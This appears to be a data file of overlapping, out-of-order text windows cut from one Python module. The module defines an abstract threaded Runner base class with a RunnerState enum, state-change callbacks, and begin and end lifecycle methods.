"runner_state print('New RunnerState (%s) {%s}' % (runner_state, self._runner_uuid)) # Inform the user of",
"if self._stopping: print('Ignoring (already in progress). {%s}' % self._runner_uuid) return elif self._runner_state in",
"BEGIN. # The last and final event is always END. # # The",
"(assigned in begin()) PREPARING = auto() # The Runner is preparing to run",
"to a runner # that's successfully created, runs, completes and is then #",
"RUNNING - COMPLETE - END BEGIN = auto() # The Runner initial state",
"{%s}' % (runner_state, self._runner_uuid)) # Inform the user of each state change. #",
"This should cause the main thread to exit - it's # the responsibility",
"be prematurely stopped. Runners have a built-in lifetime and are normally left to",
"A synchronisation lock self.lock = threading.Lock() print('New Runner() {%s}' % self._runner_uuid) def _set_runner_state(self,",
"This method must not block. \"\"\" assert self._runner_state is None self._set_runner_state(RunnerState.BEGIN) def end(self):",
"has completed. This method must not block. \"\"\" print('End called... {%s}' % self._runner_uuid)",
"The receiver must expect a `RunnerStateTuple` as the first argument # in the",
"must expect a `RunnerStateTuple` as the first argument # in the callback method.",
"has been a problem END = auto() # The last event, issued when",
"that's successfully created, runs, completes and is then # automatically deleted is represented",
"first argument # in the callback method. assert self._state_callback rso = RunnerStateTuple(runner_state, self._callback_context,",
"\"\"\" print('End called... {%s}' % self._runner_uuid) if self._stopping: print('Ignoring (already in progress). {%s}'",
"This method must not block. \"\"\" print('End called... {%s}' % self._runner_uuid) if self._stopping:",
"cause the main thread to exit - it's # the responsibility of the",
"callback self._callback_context = callback_context self._runner_state = None self._stopping = False self._runner_uuid = uuid.uuid4()",
"\"\"\" def __init__(self, callback, callback_context): \"\"\"The basic Runner initialser. \"\"\" threading.Thread.__init__(self) assert callable(callback)",
"- in response to a stop() FAILED = auto() # There has been",
"a problem END = auto() # The last event, issued when the runner's",
"stopped - in response to a stop() FAILED = auto() # There has",
"state_callback will be supplied with instances of the RunnerState as the runner progresses.",
"``STOPPING`` and ``STOPPED``, normally not seen. This method does nothing if the Runner",
"response to a stop() FAILED = auto() # There has been a problem",
"= auto() # The Runner is stopping - in response to a stop()",
"still running this method introduces the ``RunnerState`` values of ``STOPPING`` and ``STOPPED``, normally",
"self._runner_uuid) if self._stopping: print('Ignoring (already in progress). {%s}' % self._runner_uuid) return elif self._runner_state",
"last and final event is always END. # # The normal event sequence,",
"\"\"\"The ``Runner`` base class, from which all Runners are derived. \"\"\" def __init__(self,",
"self._runner_uuid)) # Inform the user of each state change. # The receiver must",
"state change. # The receiver must expect a `RunnerStateTuple` as the first argument",
"user. :param runner_state: The new Runner state :type runner_state: ``RunnerState \"\"\" assert isinstance(runner_state,",
"auto() # There has been a problem END = auto() # The last",
"successfully created, runs, completes and is then # automatically deleted is represented by",
"main thread to exit - it's # the responsibility of the implementing class.",
"threading.Thread.__init__(self) assert callable(callback) self._state_callback = callback self._callback_context = callback_context self._runner_state = None self._stopping",
"(runner_state, self._runner_uuid)) # Inform the user of each state change. # The receiver",
"assert callable(callback) self._state_callback = callback self._callback_context = callback_context self._runner_state = None self._stopping =",
"self._runner_state in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner already gone). {%s}' % self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING)",
"assert self._state_callback rso = RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso, self._callback_context) @abstractmethod def begin(self): \"\"\"Starts",
"in response to a stop() FAILED = auto() # There has been a",
"then # automatically deleted is represented by the following sequence: # # BEGIN",
"# The last and final event is always END. # # The normal",
"stop() STOPPED = auto() # The runner has stopped - in response to",
"= False self._runner_uuid = uuid.uuid4() # A synchronisation lock self.lock = threading.Lock() print('New",
"Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner`` base class, from which all Runners are derived. \"\"\"",
"= runner_state print('New RunnerState (%s) {%s}' % (runner_state, self._runner_uuid)) # Inform the user",
"a Runner is to be prematurely stopped. Runners have a built-in lifetime and",
"% self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) # Just set the 'stopping' field (and change the",
"runner_state, msg=None): \"\"\"Sets the runner state and informs the user. :param runner_state: The",
"progress). {%s}' % self._runner_uuid) return elif self._runner_state in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner already",
"END = auto() # The last event, issued when the runner's gone RunnerStateTuple",
"is always END. # # The normal event sequence, which relates to a",
"auto() # The last event, issued when the runner's gone RunnerStateTuple = namedtuple('Runner',",
"called once. This method must not block. \"\"\" assert self._runner_state is None self._set_runner_state(RunnerState.BEGIN)",
"if the Runner is already stopping or has completed. This method must not",
"of ``STOPPING`` and ``STOPPED``, normally not seen. This method does nothing if the",
"self.lock = threading.Lock() print('New Runner() {%s}' % self._runner_uuid) def _set_runner_state(self, runner_state, msg=None): \"\"\"Sets",
"be supplied with instances of the RunnerState as the runner progresses. This method",
"None self._stopping = False self._runner_uuid = uuid.uuid4() # A synchronisation lock self.lock =",
"[RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner already gone). {%s}' % self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) # Just",
"The Runner is preparing to run RUNNING = auto() # The Runner is",
"synchronisation lock self.lock = threading.Lock() print('New Runner() {%s}' % self._runner_uuid) def _set_runner_state(self, runner_state,",
"uuid.uuid4() # A synchronisation lock self.lock = threading.Lock() print('New Runner() {%s}' % self._runner_uuid)",
"expect a `RunnerStateTuple` as the first argument # in the callback method. assert",
"and ``STOPPED``, normally not seen. This method does nothing if the Runner is",
"a built-in lifetime and are normally left to complete naturally. If the Runner",
"assert self._runner_state is None self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops the Runner. This method should",
"introduces the ``RunnerState`` values of ``STOPPING`` and ``STOPPED``, normally not seen. This method",
"of each state change. # The receiver must expect a `RunnerStateTuple` as the",
"(%s) {%s}' % (runner_state, self._runner_uuid)) # Inform the user of each state change.",
"namedtuple from enum import Enum, auto, unique import threading import uuid RUNNER_IMAGE =",
"# The receiver must expect a `RunnerStateTuple` as the first argument # in",
"state (assigned in begin()) PREPARING = auto() # The Runner is preparing to",
"gone). {%s}' % self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) # Just set the 'stopping' field (and",
"runner's gone RunnerStateTuple = namedtuple('Runner', ['state', 'context', 'msg']) class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner``",
"'alanbchristie/pydatalister' RUNNER_TAG = 'latest' @unique class RunnerState(Enum): \"\"\"Runner execution states. \"\"\" # The",
"its actions (naturally) STOPPING = auto() # The Runner is stopping - in",
"the main thread to exit - it's # the responsibility of the implementing",
"{%s}' % self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) # Just set the 'stopping' field (and change",
"{%s}' % self._runner_uuid) if self._stopping: print('Ignoring (already in progress). {%s}' % self._runner_uuid) return",
"# The first event is always BEGIN. # The last and final event",
"normally left to complete naturally. If the Runner is still running this method",
"the RunnerState as the runner progresses. This method must only be called once.",
"called only of a Runner is to be prematurely stopped. Runners have a",
"BEGIN = auto() # The Runner initial state (assigned in begin()) PREPARING =",
"print('New Runner() {%s}' % self._runner_uuid) def _set_runner_state(self, runner_state, msg=None): \"\"\"Sets the runner state",
"= auto() # The last event, issued when the runner's gone RunnerStateTuple =",
"RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso, self._callback_context) @abstractmethod def begin(self): \"\"\"Starts the Runner. The state_callback",
"PREPARING = auto() # The Runner is preparing to run RUNNING = auto()",
"{%s}' % self._runner_uuid) def _set_runner_state(self, runner_state, msg=None): \"\"\"Sets the runner state and informs",
"method should be called only of a Runner is to be prematurely stopped.",
"is to be prematurely stopped. Runners have a built-in lifetime and are normally",
"callback_context self._runner_state = None self._stopping = False self._runner_uuid = uuid.uuid4() # A synchronisation",
"uuid RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG = 'latest' @unique class RunnerState(Enum): \"\"\"Runner execution states.",
"The first event is always BEGIN. # The last and final event is",
"The new Runner state :type runner_state: ``RunnerState \"\"\" assert isinstance(runner_state, RunnerState) self._runner_state =",
"the user of each state change. # The receiver must expect a `RunnerStateTuple`",
"is always BEGIN. # The last and final event is always END. #",
"print('New RunnerState (%s) {%s}' % (runner_state, self._runner_uuid)) # Inform the user of each",
"already gone). {%s}' % self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) # Just set the 'stopping' field",
"the runner state and informs the user. :param runner_state: The new Runner state",
"``RunnerState \"\"\" assert isinstance(runner_state, RunnerState) self._runner_state = runner_state print('New RunnerState (%s) {%s}' %",
"from collections import namedtuple from enum import Enum, auto, unique import threading import",
"a stop() STOPPED = auto() # The runner has stopped - in response",
"= auto() # The runner has stopped - in response to a stop()",
"a stop() FAILED = auto() # There has been a problem END =",
"RunnerState.END]: print('Ignoring (Runner already gone). {%s}' % self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) # Just set",
"by the following sequence: # # BEGIN - PREPARING - RUNNING - COMPLETE",
"def begin(self): \"\"\"Starts the Runner. The state_callback will be supplied with instances of",
"@unique class RunnerState(Enum): \"\"\"Runner execution states. \"\"\" # The first event is always",
"called... {%s}' % self._runner_uuid) if self._stopping: print('Ignoring (already in progress). {%s}' % self._runner_uuid)",
"it's # the responsibility of the implementing class. self._stopping = True print('End is",
"in response to a stop() STOPPED = auto() # The runner has stopped",
"% self._runner_uuid) return elif self._runner_state in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner already gone). {%s}'",
"must not block. \"\"\" assert self._runner_state is None self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops the",
"\"\"\" threading.Thread.__init__(self) assert callable(callback) self._state_callback = callback self._callback_context = callback_context self._runner_state = None",
"STOPPED = auto() # The runner has stopped - in response to a",
"def _set_runner_state(self, runner_state, msg=None): \"\"\"Sets the runner state and informs the user. :param",
"naturally. If the Runner is still running this method introduces the ``RunnerState`` values",
"stopping - in response to a stop() STOPPED = auto() # The runner",
"runner_state: ``RunnerState \"\"\" assert isinstance(runner_state, RunnerState) self._runner_state = runner_state print('New RunnerState (%s) {%s}'",
"= callback self._callback_context = callback_context self._runner_state = None self._stopping = False self._runner_uuid =",
"assert isinstance(runner_state, RunnerState) self._runner_state = runner_state print('New RunnerState (%s) {%s}' % (runner_state, self._runner_uuid))",
"This method should be called only of a Runner is to be prematurely",
"# Inform the user of each state change. # The receiver must expect",
"running this method introduces the ``RunnerState`` values of ``STOPPING`` and ``STOPPED``, normally not",
"the state). # This should cause the main thread to exit - it's",
"The Runner is Running COMPLETE = auto() # The Runner has completed its",
"the user. :param runner_state: The new Runner state :type runner_state: ``RunnerState \"\"\" assert",
"unique import threading import uuid RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG = 'latest' @unique class",
"Runner is preparing to run RUNNING = auto() # The Runner is Running",
"only of a Runner is to be prematurely stopped. Runners have a built-in",
"The Runner initial state (assigned in begin()) PREPARING = auto() # The Runner",
"actions (naturally) STOPPING = auto() # The Runner is stopping - in response",
"deleted is represented by the following sequence: # # BEGIN - PREPARING -",
"``Runner`` base class, from which all Runners are derived. \"\"\" def __init__(self, callback,",
"final event is always END. # # The normal event sequence, which relates",
"# The normal event sequence, which relates to a runner # that's successfully",
"prematurely stopped. Runners have a built-in lifetime and are normally left to complete",
"last event, issued when the runner's gone RunnerStateTuple = namedtuple('Runner', ['state', 'context', 'msg'])",
"to a stop() STOPPED = auto() # The runner has stopped - in",
"msg=None): \"\"\"Sets the runner state and informs the user. :param runner_state: The new",
"always BEGIN. # The last and final event is always END. # #",
"= namedtuple('Runner', ['state', 'context', 'msg']) class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner`` base class, from",
"RUNNER_TAG = 'latest' @unique class RunnerState(Enum): \"\"\"Runner execution states. \"\"\" # The first",
"does nothing if the Runner is already stopping or has completed. This method",
"python3 \"\"\"An abstract _Runner_ module. \"\"\" from abc import ABCMeta, abstractmethod from collections",
"Runner is to be prematurely stopped. Runners have a built-in lifetime and are",
"auto, unique import threading import uuid RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG = 'latest' @unique",
"the Runner is already stopping or has completed. This method must not block.",
"user of each state change. # The receiver must expect a `RunnerStateTuple` as",
"def __init__(self, callback, callback_context): \"\"\"The basic Runner initialser. \"\"\" threading.Thread.__init__(self) assert callable(callback) self._state_callback",
"and is then # automatically deleted is represented by the following sequence: #",
"sequence, which relates to a runner # that's successfully created, runs, completes and",
"'latest' @unique class RunnerState(Enum): \"\"\"Runner execution states. \"\"\" # The first event is",
"built-in lifetime and are normally left to complete naturally. If the Runner is",
"the Runner. The state_callback will be supplied with instances of the RunnerState as",
"block. \"\"\" print('End called... {%s}' % self._runner_uuid) if self._stopping: print('Ignoring (already in progress).",
"run RUNNING = auto() # The Runner is Running COMPLETE = auto() #",
"issued when the runner's gone RunnerStateTuple = namedtuple('Runner', ['state', 'context', 'msg']) class Runner(threading.Thread,",
"or has completed. This method must not block. \"\"\" print('End called... {%s}' %",
"(naturally) STOPPING = auto() # The Runner is stopping - in response to",
"import ABCMeta, abstractmethod from collections import namedtuple from enum import Enum, auto, unique",
"isinstance(runner_state, RunnerState) self._runner_state = runner_state print('New RunnerState (%s) {%s}' % (runner_state, self._runner_uuid)) #",
"print('End called... {%s}' % self._runner_uuid) if self._stopping: print('Ignoring (already in progress). {%s}' %",
"% (runner_state, self._runner_uuid)) # Inform the user of each state change. # The",
"from abc import ABCMeta, abstractmethod from collections import namedtuple from enum import Enum,",
"Runner initialser. \"\"\" threading.Thread.__init__(self) assert callable(callback) self._state_callback = callback self._callback_context = callback_context self._runner_state",
"self._callback_context, msg) self._state_callback(rso, self._callback_context) @abstractmethod def begin(self): \"\"\"Starts the Runner. The state_callback will",
"# that's successfully created, runs, completes and is then # automatically deleted is",
"The last and final event is always END. # # The normal event",
"runs, completes and is then # automatically deleted is represented by the following",
"FAILED = auto() # There has been a problem END = auto() #",
"self._runner_state = runner_state print('New RunnerState (%s) {%s}' % (runner_state, self._runner_uuid)) # Inform the",
"stopping or has completed. This method must not block. \"\"\" print('End called... {%s}'",
"# This should cause the main thread to exit - it's # the",
"COMPLETE = auto() # The Runner has completed its actions (naturally) STOPPING =",
"with instances of the RunnerState as the runner progresses. This method must only",
"is already stopping or has completed. This method must not block. \"\"\" print('End",
"# There has been a problem END = auto() # The last event,",
"% self._runner_uuid) def _set_runner_state(self, runner_state, msg=None): \"\"\"Sets the runner state and informs the",
"This method does nothing if the Runner is already stopping or has completed.",
"= 'alanbchristie/pydatalister' RUNNER_TAG = 'latest' @unique class RunnerState(Enum): \"\"\"Runner execution states. \"\"\" #",
"RunnerState as the runner progresses. This method must only be called once. This",
"stop() FAILED = auto() # There has been a problem END = auto()",
"to a stop() FAILED = auto() # There has been a problem END",
"RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG = 'latest' @unique class RunnerState(Enum): \"\"\"Runner execution states. \"\"\"",
"has completed its actions (naturally) STOPPING = auto() # The Runner is stopping",
"completed its actions (naturally) STOPPING = auto() # The Runner is stopping -",
"(and change the state). # This should cause the main thread to exit",
"\"\"\"The basic Runner initialser. \"\"\" threading.Thread.__init__(self) assert callable(callback) self._state_callback = callback self._callback_context =",
"import uuid RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG = 'latest' @unique class RunnerState(Enum): \"\"\"Runner execution",
"auto() # The Runner has completed its actions (naturally) STOPPING = auto() #",
"# Just set the 'stopping' field (and change the state). # This should",
"to exit - it's # the responsibility of the implementing class. self._stopping =",
"change the state). # This should cause the main thread to exit -",
"stopped. Runners have a built-in lifetime and are normally left to complete naturally.",
"\"\"\"An abstract _Runner_ module. \"\"\" from abc import ABCMeta, abstractmethod from collections import",
"namedtuple('Runner', ['state', 'context', 'msg']) class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner`` base class, from which",
"from which all Runners are derived. \"\"\" def __init__(self, callback, callback_context): \"\"\"The basic",
"when the runner's gone RunnerStateTuple = namedtuple('Runner', ['state', 'context', 'msg']) class Runner(threading.Thread, metaclass=ABCMeta):",
"method must not block. \"\"\" assert self._runner_state is None self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops",
"``STOPPED``, normally not seen. This method does nothing if the Runner is already",
"states. \"\"\" # The first event is always BEGIN. # The last and",
"will be supplied with instances of the RunnerState as the runner progresses. This",
"If the Runner is still running this method introduces the ``RunnerState`` values of",
"in progress). {%s}' % self._runner_uuid) return elif self._runner_state in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner",
"self._set_runner_state(RunnerState.STOPPING) # Just set the 'stopping' field (and change the state). # This",
"- COMPLETE - END BEGIN = auto() # The Runner initial state (assigned",
"runner_state: The new Runner state :type runner_state: ``RunnerState \"\"\" assert isinstance(runner_state, RunnerState) self._runner_state",
"{%s}' % self._runner_uuid) return elif self._runner_state in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner already gone).",
"# The Runner is preparing to run RUNNING = auto() # The Runner",
"# The Runner is Running COMPLETE = auto() # The Runner has completed",
"# The Runner initial state (assigned in begin()) PREPARING = auto() # The",
":param runner_state: The new Runner state :type runner_state: ``RunnerState \"\"\" assert isinstance(runner_state, RunnerState)",
"a runner # that's successfully created, runs, completes and is then # automatically",
"completed. This method must not block. \"\"\" print('End called... {%s}' % self._runner_uuid) if",
"# The Runner has completed its actions (naturally) STOPPING = auto() # The",
"import threading import uuid RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG = 'latest' @unique class RunnerState(Enum):",
"``RunnerState`` values of ``STOPPING`` and ``STOPPED``, normally not seen. This method does nothing",
"event is always BEGIN. # The last and final event is always END.",
"are normally left to complete naturally. If the Runner is still running this",
"relates to a runner # that's successfully created, runs, completes and is then",
"return self._set_runner_state(RunnerState.STOPPING) # Just set the 'stopping' field (and change the state). #",
"auto() # The Runner initial state (assigned in begin()) PREPARING = auto() #",
"\"\"\"Starts the Runner. The state_callback will be supplied with instances of the RunnerState",
"END. # # The normal event sequence, which relates to a runner #",
"responsibility of the implementing class. self._stopping = True print('End is nigh! {%s}' %",
"to complete naturally. If the Runner is still running this method introduces the",
"the first argument # in the callback method. assert self._state_callback rso = RunnerStateTuple(runner_state,",
"PREPARING - RUNNING - COMPLETE - END BEGIN = auto() # The Runner",
"is still running this method introduces the ``RunnerState`` values of ``STOPPING`` and ``STOPPED``,",
"= threading.Lock() print('New Runner() {%s}' % self._runner_uuid) def _set_runner_state(self, runner_state, msg=None): \"\"\"Sets the",
"auto() # The runner has stopped - in response to a stop() FAILED",
"self._stopping: print('Ignoring (already in progress). {%s}' % self._runner_uuid) return elif self._runner_state in [RunnerState.COMPLETE,",
"must only be called once. This method must not block. \"\"\" assert self._runner_state",
"state :type runner_state: ``RunnerState \"\"\" assert isinstance(runner_state, RunnerState) self._runner_state = runner_state print('New RunnerState",
"state and informs the user. :param runner_state: The new Runner state :type runner_state:",
"The Runner is stopping - in response to a stop() STOPPED = auto()",
"begin(self): \"\"\"Starts the Runner. The state_callback will be supplied with instances of the",
"only be called once. This method must not block. \"\"\" assert self._runner_state is",
"RunnerState) self._runner_state = runner_state print('New RunnerState (%s) {%s}' % (runner_state, self._runner_uuid)) # Inform",
"should be called only of a Runner is to be prematurely stopped. Runners",
"response to a stop() STOPPED = auto() # The runner has stopped -",
"complete naturally. If the Runner is still running this method introduces the ``RunnerState``",
"argument # in the callback method. assert self._state_callback rso = RunnerStateTuple(runner_state, self._callback_context, msg)",
"have a built-in lifetime and are normally left to complete naturally. If the",
"COMPLETE - END BEGIN = auto() # The Runner initial state (assigned in",
"\"\"\" assert isinstance(runner_state, RunnerState) self._runner_state = runner_state print('New RunnerState (%s) {%s}' % (runner_state,",
"all Runners are derived. \"\"\" def __init__(self, callback, callback_context): \"\"\"The basic Runner initialser.",
"`RunnerStateTuple` as the first argument # in the callback method. assert self._state_callback rso",
"module. \"\"\" from abc import ABCMeta, abstractmethod from collections import namedtuple from enum",
"and are normally left to complete naturally. If the Runner is still running",
"\"\"\"Sets the runner state and informs the user. :param runner_state: The new Runner",
"# The last event, issued when the runner's gone RunnerStateTuple = namedtuple('Runner', ['state',",
"self._runner_uuid = uuid.uuid4() # A synchronisation lock self.lock = threading.Lock() print('New Runner() {%s}'",
"informs the user. :param runner_state: The new Runner state :type runner_state: ``RunnerState \"\"\"",
"be called once. This method must not block. \"\"\" assert self._runner_state is None",
"receiver must expect a `RunnerStateTuple` as the first argument # in the callback",
"the 'stopping' field (and change the state). # This should cause the main",
"basic Runner initialser. \"\"\" threading.Thread.__init__(self) assert callable(callback) self._state_callback = callback self._callback_context = callback_context",
"left to complete naturally. If the Runner is still running this method introduces",
"# automatically deleted is represented by the following sequence: # # BEGIN -",
"Runner initial state (assigned in begin()) PREPARING = auto() # The Runner is",
":type runner_state: ``RunnerState \"\"\" assert isinstance(runner_state, RunnerState) self._runner_state = runner_state print('New RunnerState (%s)",
"in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner already gone). {%s}' % self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) #",
"= 'latest' @unique class RunnerState(Enum): \"\"\"Runner execution states. \"\"\" # The first event",
"- END BEGIN = auto() # The Runner initial state (assigned in begin())",
"# The runner has stopped - in response to a stop() FAILED =",
"should cause the main thread to exit - it's # the responsibility of",
"self._runner_uuid) def _set_runner_state(self, runner_state, msg=None): \"\"\"Sets the runner state and informs the user.",
"the following sequence: # # BEGIN - PREPARING - RUNNING - COMPLETE -",
"print('Ignoring (already in progress). {%s}' % self._runner_uuid) return elif self._runner_state in [RunnerState.COMPLETE, RunnerState.END]:",
"and final event is always END. # # The normal event sequence, which",
"Runner() {%s}' % self._runner_uuid) def _set_runner_state(self, runner_state, msg=None): \"\"\"Sets the runner state and",
"self._stopping = False self._runner_uuid = uuid.uuid4() # A synchronisation lock self.lock = threading.Lock()",
"which relates to a runner # that's successfully created, runs, completes and is",
"state). # This should cause the main thread to exit - it's #",
"method. assert self._state_callback rso = RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso, self._callback_context) @abstractmethod def begin(self):",
"\"\"\" from abc import ABCMeta, abstractmethod from collections import namedtuple from enum import",
"import namedtuple from enum import Enum, auto, unique import threading import uuid RUNNER_IMAGE",
"this method introduces the ``RunnerState`` values of ``STOPPING`` and ``STOPPED``, normally not seen.",
"\"\"\"Stops the Runner. This method should be called only of a Runner is",
"derived. \"\"\" def __init__(self, callback, callback_context): \"\"\"The basic Runner initialser. \"\"\" threading.Thread.__init__(self) assert",
"'msg']) class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner`` base class, from which all Runners are",
"completes and is then # automatically deleted is represented by the following sequence:",
"END BEGIN = auto() # The Runner initial state (assigned in begin()) PREPARING",
"Runner has completed its actions (naturally) STOPPING = auto() # The Runner is",
"Enum, auto, unique import threading import uuid RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG = 'latest'",
"is None self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops the Runner. This method should be called",
"self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops the Runner. This method should be called only of",
"The Runner has completed its actions (naturally) STOPPING = auto() # The Runner",
"of the RunnerState as the runner progresses. This method must only be called",
"must not block. \"\"\" print('End called... {%s}' % self._runner_uuid) if self._stopping: print('Ignoring (already",
"normally not seen. This method does nothing if the Runner is already stopping",
"self._runner_state is None self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops the Runner. This method should be",
"the runner's gone RunnerStateTuple = namedtuple('Runner', ['state', 'context', 'msg']) class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The",
"not seen. This method does nothing if the Runner is already stopping or",
"# in the callback method. assert self._state_callback rso = RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso,",
"@abstractmethod def begin(self): \"\"\"Starts the Runner. The state_callback will be supplied with instances",
"Runner is stopping - in response to a stop() STOPPED = auto() #",
"RUNNING = auto() # The Runner is Running COMPLETE = auto() # The",
"['state', 'context', 'msg']) class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner`` base class, from which all",
"and informs the user. :param runner_state: The new Runner state :type runner_state: ``RunnerState",
"represented by the following sequence: # # BEGIN - PREPARING - RUNNING -",
"__init__(self, callback, callback_context): \"\"\"The basic Runner initialser. \"\"\" threading.Thread.__init__(self) assert callable(callback) self._state_callback =",
"Runner is Running COMPLETE = auto() # The Runner has completed its actions",
"method must only be called once. This method must not block. \"\"\" assert",
"automatically deleted is represented by the following sequence: # # BEGIN - PREPARING",
"following sequence: # # BEGIN - PREPARING - RUNNING - COMPLETE - END",
"event sequence, which relates to a runner # that's successfully created, runs, completes",
"in begin()) PREPARING = auto() # The Runner is preparing to run RUNNING",
"RunnerState(Enum): \"\"\"Runner execution states. \"\"\" # The first event is always BEGIN. #",
"execution states. \"\"\" # The first event is always BEGIN. # The last",
"self._state_callback rso = RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso, self._callback_context) @abstractmethod def begin(self): \"\"\"Starts the",
"self._runner_state = None self._stopping = False self._runner_uuid = uuid.uuid4() # A synchronisation lock",
"callback_context): \"\"\"The basic Runner initialser. \"\"\" threading.Thread.__init__(self) assert callable(callback) self._state_callback = callback self._callback_context",
"abstractmethod from collections import namedtuple from enum import Enum, auto, unique import threading",
"each state change. # The receiver must expect a `RunnerStateTuple` as the first",
"= auto() # The Runner is preparing to run RUNNING = auto() #",
"nothing if the Runner is already stopping or has completed. This method must",
"progresses. This method must only be called once. This method must not block.",
"change. # The receiver must expect a `RunnerStateTuple` as the first argument #",
"is stopping - in response to a stop() STOPPED = auto() # The",
"set the 'stopping' field (and change the state). # This should cause the",
"are derived. \"\"\" def __init__(self, callback, callback_context): \"\"\"The basic Runner initialser. \"\"\" threading.Thread.__init__(self)",
"auto() # The Runner is stopping - in response to a stop() STOPPED",
"the Runner is still running this method introduces the ``RunnerState`` values of ``STOPPING``",
"not block. \"\"\" print('End called... {%s}' % self._runner_uuid) if self._stopping: print('Ignoring (already in",
"auto() # The Runner is Running COMPLETE = auto() # The Runner has",
"a `RunnerStateTuple` as the first argument # in the callback method. assert self._state_callback",
"field (and change the state). # This should cause the main thread to",
"callable(callback) self._state_callback = callback self._callback_context = callback_context self._runner_state = None self._stopping = False",
"always END. # # The normal event sequence, which relates to a runner",
"supplied with instances of the RunnerState as the runner progresses. This method must",
"the Runner. This method should be called only of a Runner is to",
"first event is always BEGIN. # The last and final event is always",
"BEGIN - PREPARING - RUNNING - COMPLETE - END BEGIN = auto() #",
"The last event, issued when the runner's gone RunnerStateTuple = namedtuple('Runner', ['state', 'context',",
"initialser. \"\"\" threading.Thread.__init__(self) assert callable(callback) self._state_callback = callback self._callback_context = callback_context self._runner_state =",
"runner state and informs the user. :param runner_state: The new Runner state :type",
"as the runner progresses. This method must only be called once. This method",
"in the callback method. assert self._state_callback rso = RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso, self._callback_context)",
"already stopping or has completed. This method must not block. \"\"\" print('End called...",
"to run RUNNING = auto() # The Runner is Running COMPLETE = auto()",
"is then # automatically deleted is represented by the following sequence: # #",
"the responsibility of the implementing class. self._stopping = True print('End is nigh! {%s}'",
"event, issued when the runner's gone RunnerStateTuple = namedtuple('Runner', ['state', 'context', 'msg']) class",
"Inform the user of each state change. # The receiver must expect a",
"values of ``STOPPING`` and ``STOPPED``, normally not seen. This method does nothing if",
"gone RunnerStateTuple = namedtuple('Runner', ['state', 'context', 'msg']) class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner`` base",
"msg) self._state_callback(rso, self._callback_context) @abstractmethod def begin(self): \"\"\"Starts the Runner. The state_callback will be",
"Runner. This method should be called only of a Runner is to be",
"self._runner_uuid) return elif self._runner_state in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner already gone). {%s}' %",
"\"\"\" # The first event is always BEGIN. # The last and final",
"collections import namedtuple from enum import Enum, auto, unique import threading import uuid",
"problem END = auto() # The last event, issued when the runner's gone",
"instances of the RunnerState as the runner progresses. This method must only be",
"class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner`` base class, from which all Runners are derived.",
"# A synchronisation lock self.lock = threading.Lock() print('New Runner() {%s}' % self._runner_uuid) def",
"= auto() # There has been a problem END = auto() # The",
"The state_callback will be supplied with instances of the RunnerState as the runner",
"be called only of a Runner is to be prematurely stopped. Runners have",
"method does nothing if the Runner is already stopping or has completed. This",
"# # BEGIN - PREPARING - RUNNING - COMPLETE - END BEGIN =",
"The runner has stopped - in response to a stop() FAILED = auto()",
"print('Ignoring (Runner already gone). {%s}' % self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) # Just set the",
"normal event sequence, which relates to a runner # that's successfully created, runs,",
"- PREPARING - RUNNING - COMPLETE - END BEGIN = auto() # The",
"Runners have a built-in lifetime and are normally left to complete naturally. If",
"= None self._stopping = False self._runner_uuid = uuid.uuid4() # A synchronisation lock self.lock",
"method introduces the ``RunnerState`` values of ``STOPPING`` and ``STOPPED``, normally not seen. This",
"self._callback_context = callback_context self._runner_state = None self._stopping = False self._runner_uuid = uuid.uuid4() #",
"auto() # The Runner is preparing to run RUNNING = auto() # The",
"is preparing to run RUNNING = auto() # The Runner is Running COMPLETE",
"runner progresses. This method must only be called once. This method must not",
"the runner progresses. This method must only be called once. This method must",
"runner has stopped - in response to a stop() FAILED = auto() #",
"rso = RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso, self._callback_context) @abstractmethod def begin(self): \"\"\"Starts the Runner.",
"is represented by the following sequence: # # BEGIN - PREPARING - RUNNING",
"ABCMeta, abstractmethod from collections import namedtuple from enum import Enum, auto, unique import",
